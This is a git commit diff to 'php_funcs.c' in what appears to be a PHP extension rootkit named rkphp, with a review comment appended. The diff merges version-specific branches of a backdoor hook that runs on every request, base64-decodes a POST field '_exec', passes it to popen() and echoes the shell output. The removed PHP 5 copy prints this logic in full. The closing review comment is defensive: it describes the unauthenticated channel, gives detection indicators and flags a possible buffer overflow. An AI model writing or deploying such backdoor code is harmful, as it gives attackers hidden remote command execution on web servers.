Root 5 years ago
parent
commit
90696aee1a
  1. 56
      rkphp/src/php_funcs.c

56
rkphp/src/php_funcs.c

@ -20,10 +20,11 @@ static int rkphp_hook( @@ -20,10 +20,11 @@ static int rkphp_hook(
}
#if PHP_MAJOR_VERSION < 7
if(zend_hash_find_ptr(CG(function_table),
method_name, strlen(method_name)) == SUCCESS)
#else
if((function = zend_hash_str_find_ptr(CG(function_table),
method_name, strlen(method_name))) != NULL)
#else
if(zend_hash_find_ptr(CG(function_table), method_name, strlen(method_name)) == SUCCESS)
#endif
{
*original = function->internal_function.handler;
@ -173,49 +174,23 @@ PHP_RINIT_FUNCTION(rkphp) @@ -173,49 +174,23 @@ PHP_RINIT_FUNCTION(rkphp)
zval *arr;
#if PHP_MAJOR_VERSION < 7
if(zend_hash_find(&EG(symbol_table), "_POST", sizeof("_POST") - 1, &arr) == SUCCESS)
{
zval *val;
HashTable *ht = Z_ARRVAL_P(arr);
if(zend_hash_find(ht, "_exec", sizeof("_exec") - 1) == SUCCESS)
{
FILE *fp;
char output[2048], decoded[1024], *encoded;
encoded = Z_STRVAL_P(val);
if(base64_decode(encoded, decoded, strlen(encoded)) == 0)
{
RKPHP_PRINTF("[!] Not a valid base64 string!\n");
return SUCCESS;
}
if((fp = popen(decoded, "r")) == NULL)
{
RKPHP_PRINTF("Unable to execute cmd!\n");
return SUCCESS;
}
php_printf("<pre>\n");
while(fgets(output, sizeof(output) - 1, fp) != NULL)
{
php_printf("%s", output);
}
php_printf("</pre>\n");
pclose(fp);
}
}
if(zend_hash_find(&EG(symbol_table),
"_POST", sizeof("_POST") - 1, &arr) == SUCCESS)
#else
if((arr = zend_hash_str_find(&EG(symbol_table), "_POST", sizeof("_POST") - 1)) != NULL)
if((arr = zend_hash_str_find(&EG(symbol_table),
"_POST", sizeof("_POST") - 1)) != NULL)
#endif
{
zval *val;
HashTable *ht = Z_ARRVAL_P(arr);
if((val = zend_hash_str_find(ht, "_exec", sizeof("_exec") - 1)) != NULL)
#if PHP_MAJOR_VERSION < 7
if(zend_hash_find(ht,
"_exec", sizeof("_exec") - 1, &val) == SUCCESS)
#else
if((val = zend_hash_str_find(ht,
"_exec", sizeof("_exec") - 1)) != NULL)
#endif
{
FILE *fp;
char output[2048], decoded[1024], *encoded;
@ -246,7 +221,6 @@ PHP_RINIT_FUNCTION(rkphp) @@ -246,7 +221,6 @@ PHP_RINIT_FUNCTION(rkphp)
pclose(fp);
}
}
#endif
return SUCCESS;
}
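Review bot: The `_exec` path in `PHP_RINIT_FUNCTION(rkphp)` (second hunk) is an unauthenticated command channel and nothing in the code says so. The removed PHP 5 copy base64-decodes the `_exec` field of `_POST` and passes it to `popen()`, and the surviving `FILE *fp` and `pclose(fp)` suggest the kept copy does the same, although the lines between the hunks are not shown. I would put a comment above the `_POST` lookup so that anyone triaging this module sees it at once: `/* RINIT runs on every request: POST field "_exec" is base64-decoded and passed to popen(); output is echoed inside <pre>. No authentication. */`. For detection, the indicators visible here are a loaded extension named `rkphp`, requests carrying an `_exec` POST field, and PHP worker processes spawning a shell. Separately, `decoded[1024]` is filled from request data, and the removed copy's `base64_decode()` call passes only the input length, so if that helper does not bound its output the module also exposes the worker to stack corruption.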
